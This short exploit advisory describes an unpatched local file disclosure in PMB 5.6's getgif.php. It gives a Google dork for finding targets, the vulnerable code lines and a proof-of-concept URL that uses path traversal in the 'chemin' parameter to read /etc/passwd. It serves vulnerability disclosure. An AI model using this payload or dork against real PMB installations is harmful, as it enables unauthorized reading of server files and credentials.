PMB 5.6 Local File Disclosure / Directory Traversal

PMB version 5.6 suffers from a local file disclosure vulnerability.


MD5 | 431ff9b71930385b5b2560f2e379a207

# Exploit Title: PMB 5.6 - 'chemin' Local File Disclosure
# Date: 2020-10-13
# Google Dork: inurl:opac_css
# Exploit Author: 41-trk (Tarik Bakir)
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 5.6
# Tested on: Ubuntu 18.04.1

The PMB Gif Image is not sanitizing the 'chemin',
which leads to Local File Disclosure.

As of today (2020-10-13) this issue is unfixed.

Vulnerable code: (getgif.php )

line 55 $fp2=@fopen($chemin, "rb");
line 68 fpassthru($fp)


========================= Proof-of-Concept ===================================================

http://127.0.0.1:2121/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik

Related Posts